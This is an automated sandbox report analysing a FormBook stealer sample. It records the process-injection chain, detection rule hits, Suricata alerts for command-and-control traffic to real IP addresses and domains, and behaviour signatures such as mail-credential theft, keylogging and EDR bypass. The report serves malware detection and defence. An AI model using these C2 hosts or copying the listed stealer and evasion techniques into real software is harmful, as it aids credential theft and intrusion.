Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1162-201.exe

Overview

General Information

Sample name:1162-201.exe
Analysis ID:1587354
MD5:334085b11d8f0dcad01bb1c6414acc91
SHA1:a6c57fab8877a751fc8da1fa0a2a5483f706d43f
SHA256:c4b0ffc82218c157054043b17c17295dc2117b3ddf54f78c6480a0f0f45fb070
Tags:exeFormbookPaymentuser-cocaman
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 1162-201.exe (PID: 5948 cmdline: "C:\Users\user\Desktop\1162-201.exe" MD5: 334085B11D8F0DCAD01BB1C6414ACC91)
    • svchost.exe (PID: 5808 cmdline: "C:\Users\user\Desktop\1162-201.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • OtAlYRopPg.exe (PID: 6044 cmdline: "C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • chkntfs.exe (PID: 4976 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
          • OtAlYRopPg.exe (PID: 6728 cmdline: "C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2328 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4623321437.00000000028A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2581550429.0000000005DA0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\1162-201.exe", CommandLine: "C:\Users\user\Desktop\1162-201.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1162-201.exe", ParentImage: C:\Users\user\Desktop\1162-201.exe, ParentProcessId: 5948, ParentProcessName: 1162-201.exe, ProcessCommandLine: "C:\Users\user\Desktop\1162-201.exe", ProcessId: 5808, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\1162-201.exe", CommandLine: "C:\Users\user\Desktop\1162-201.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1162-201.exe", ParentImage: C:\Users\user\Desktop\1162-201.exe, ParentProcessId: 5948, ParentProcessName: 1162-201.exe, ProcessCommandLine: "C:\Users\user\Desktop\1162-201.exe", ProcessId: 5808, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T09:09:55.087538+010020507451Malware Command and Control Activity Detected192.168.2.650026172.67.148.21680TCP
                2025-01-10T09:10:56.986600+010020507451Malware Command and Control Activity Detected192.168.2.649982172.65.235.9780TCP
                2025-01-10T09:11:20.332386+010020507451Malware Command and Control Activity Detected192.168.2.649987192.64.119.10980TCP
                2025-01-10T09:11:34.316833+010020507451Malware Command and Control Activity Detected192.168.2.649991188.114.96.380TCP
                2025-01-10T09:11:48.625013+010020507451Malware Command and Control Activity Detected192.168.2.64999547.83.1.9080TCP
                2025-01-10T09:12:19.334363+010020507451Malware Command and Control Activity Detected192.168.2.650000162.0.236.16980TCP
                2025-01-10T09:12:33.532223+010020507451Malware Command and Control Activity Detected192.168.2.650004192.186.58.3180TCP
                2025-01-10T09:12:48.218716+010020507451Malware Command and Control Activity Detected192.168.2.650008104.21.64.180TCP
                2025-01-10T09:13:18.082264+010020507451Malware Command and Control Activity Detected192.168.2.65001476.223.67.18980TCP
                2025-01-10T09:13:32.878782+010020507451Malware Command and Control Activity Detected192.168.2.650018103.247.11.20480TCP
                2025-01-10T09:13:46.617733+010020507451Malware Command and Control Activity Detected192.168.2.650022136.243.64.14780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T09:09:55.087538+010028554651A Network Trojan was detected192.168.2.650026172.67.148.21680TCP
                2025-01-10T09:10:56.986600+010028554651A Network Trojan was detected192.168.2.649982172.65.235.9780TCP
                2025-01-10T09:11:20.332386+010028554651A Network Trojan was detected192.168.2.649987192.64.119.10980TCP
                2025-01-10T09:11:34.316833+010028554651A Network Trojan was detected192.168.2.649991188.114.96.380TCP
                2025-01-10T09:11:48.625013+010028554651A Network Trojan was detected192.168.2.64999547.83.1.9080TCP
                2025-01-10T09:12:19.334363+010028554651A Network Trojan was detected192.168.2.650000162.0.236.16980TCP
                2025-01-10T09:12:33.532223+010028554651A Network Trojan was detected192.168.2.650004192.186.58.3180TCP
                2025-01-10T09:12:48.218716+010028554651A Network Trojan was detected192.168.2.650008104.21.64.180TCP
                2025-01-10T09:13:18.082264+010028554651A Network Trojan was detected192.168.2.65001476.223.67.18980TCP
                2025-01-10T09:13:32.878782+010028554651A Network Trojan was detected192.168.2.650018103.247.11.20480TCP
                2025-01-10T09:13:46.617733+010028554651A Network Trojan was detected192.168.2.650022136.243.64.14780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T09:11:12.568089+010028554641A Network Trojan was detected192.168.2.649983192.64.119.10980TCP
                2025-01-10T09:11:15.182909+010028554641A Network Trojan was detected192.168.2.649985192.64.119.10980TCP
                2025-01-10T09:11:17.715087+010028554641A Network Trojan was detected192.168.2.649986192.64.119.10980TCP
                2025-01-10T09:11:26.645856+010028554641A Network Trojan was detected192.168.2.649988188.114.96.380TCP
                2025-01-10T09:11:29.180718+010028554641A Network Trojan was detected192.168.2.649989188.114.96.380TCP
                2025-01-10T09:11:31.729322+010028554641A Network Trojan was detected192.168.2.649990188.114.96.380TCP
                2025-01-10T09:11:40.868995+010028554641A Network Trojan was detected192.168.2.64999247.83.1.9080TCP
                2025-01-10T09:11:43.415794+010028554641A Network Trojan was detected192.168.2.64999347.83.1.9080TCP
                2025-01-10T09:11:45.976305+010028554641A Network Trojan was detected192.168.2.64999447.83.1.9080TCP
                2025-01-10T09:12:11.142217+010028554641A Network Trojan was detected192.168.2.649997162.0.236.16980TCP
                2025-01-10T09:12:14.211745+010028554641A Network Trojan was detected192.168.2.649998162.0.236.16980TCP
                2025-01-10T09:12:16.804868+010028554641A Network Trojan was detected192.168.2.649999162.0.236.16980TCP
                2025-01-10T09:12:25.801396+010028554641A Network Trojan was detected192.168.2.650001192.186.58.3180TCP
                2025-01-10T09:12:28.347277+010028554641A Network Trojan was detected192.168.2.650002192.186.58.3180TCP
                2025-01-10T09:12:30.919683+010028554641A Network Trojan was detected192.168.2.650003192.186.58.3180TCP
                2025-01-10T09:12:40.589250+010028554641A Network Trojan was detected192.168.2.650005104.21.64.180TCP
                2025-01-10T09:12:43.099257+010028554641A Network Trojan was detected192.168.2.650006104.21.64.180TCP
                2025-01-10T09:12:45.679534+010028554641A Network Trojan was detected192.168.2.650007104.21.64.180TCP
                2025-01-10T09:13:10.285311+010028554641A Network Trojan was detected192.168.2.65001176.223.67.18980TCP
                2025-01-10T09:13:12.831793+010028554641A Network Trojan was detected192.168.2.65001276.223.67.18980TCP
                2025-01-10T09:13:15.396028+010028554641A Network Trojan was detected192.168.2.65001376.223.67.18980TCP
                2025-01-10T09:13:24.945983+010028554641A Network Trojan was detected192.168.2.650015103.247.11.20480TCP
                2025-01-10T09:13:27.495857+010028554641A Network Trojan was detected192.168.2.650016103.247.11.20480TCP
                2025-01-10T09:13:30.418691+010028554641A Network Trojan was detected192.168.2.650017103.247.11.20480TCP
                2025-01-10T09:13:38.849752+010028554641A Network Trojan was detected192.168.2.650019136.243.64.14780TCP
                2025-01-10T09:13:41.488788+010028554641A Network Trojan was detected192.168.2.650020136.243.64.14780TCP
                2025-01-10T09:13:44.064503+010028554641A Network Trojan was detected192.168.2.650021136.243.64.14780TCP
                2025-01-10T09:14:01.430656+010028554641A Network Trojan was detected192.168.2.650023172.67.148.21680TCP
                2025-01-10T09:14:04.048534+010028554641A Network Trojan was detected192.168.2.650024172.67.148.21680TCP
                2025-01-10T09:14:06.587029+010028554641A Network Trojan was detected192.168.2.650025172.67.148.21680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 1162-201.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: 1162-201.exeVirustotal: Detection: 35%Perma Link
                Source: 1162-201.exeReversingLabs: Detection: 57%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4623321437.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2581550429.0000000005DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4625453218.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4623485395.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 1162-201.exeJoe Sandbox ML: detected
                Source: 1162-201.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000002.00000002.2579030580.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547680523.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000003.2702996343.00000000006AB000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4618836793.0000000000698000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OtAlYRopPg.exe, 00000005.00000000.2502672174.000000000010E000.00000002.00000001.01000000.00000005.sdmp, OtAlYRopPg.exe, 00000007.00000000.2645298930.000000000010E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 1162-201.exe, 00000000.00000003.2158408076.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, 1162-201.exe, 00000000.00000003.2158241457.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2579237033.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2488633914.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2486363849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2581479681.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2578935147.00000000040F1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 1162-201.exe, 00000000.00000003.2158408076.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, 1162-201.exe, 00000000.00000003.2158241457.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2579237033.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2488633914.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2486363849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2581479681.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2578935147.00000000040F1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: chkntfs.pdb source: svchost.exe, 00000002.00000002.2579030580.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547680523.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000003.2702996343.00000000006AB000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4618836793.0000000000698000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: chkntfs.exe, 00000006.00000002.4625579447.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.0000000002678000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000000.2645872739.0000000002E0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2883330637.00000000124DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000006.00000002.4625579447.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.0000000002678000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000000.2645872739.0000000002E0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2883330637.00000000124DC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C8D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C8D076
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C5C2A2 FindFirstFileExW,0_2_00C5C2A2
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C8D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C8D3A9
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C99642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C99642
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C9979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C9979D
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C968EE FindFirstFileW,FindClose,0_2_00C968EE
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C9698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C9698F
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C8DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C8DBBE
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C99B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C99B2B
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C95C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C95C97
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0249CFA0 FindFirstFileW,FindNextFileW,FindClose,6_2_0249CFA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then xor eax, eax6_2_02489FB0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then pop edi6_2_0248EB14
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then mov ebx, 00000004h6_2_042A04DF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 162.0.236.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 162.0.236.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 162.0.236.169:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50008 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50008 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49983 -> 192.64.119.109:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49982 -> 172.65.235.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 76.223.67.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50014 -> 76.223.67.189:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50004 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50014 -> 76.223.67.189:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50000 -> 162.0.236.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 192.64.119.109:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 162.0.236.169:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49982 -> 172.65.235.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 192.64.119.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50017 -> 103.247.11.204:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 76.223.67.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 76.223.67.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 103.247.11.204:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49991 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49991 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49987 -> 192.64.119.109:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49987 -> 192.64.119.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 172.67.148.216:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50018 -> 103.247.11.204:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50018 -> 103.247.11.204:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50024 -> 172.67.148.216:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49995 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49995 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 172.67.148.216:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 103.247.11.204:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50022 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50022 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50026 -> 172.67.148.216:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50026 -> 172.67.148.216:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.laduta.xyz
                Source: DNS query: www.explorevision.xyz
                Source: Joe Sandbox ViewIP Address: 47.83.1.90 47.83.1.90
                Source: Joe Sandbox ViewIP Address: 76.223.67.189 76.223.67.189
                Source: Joe Sandbox ViewASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
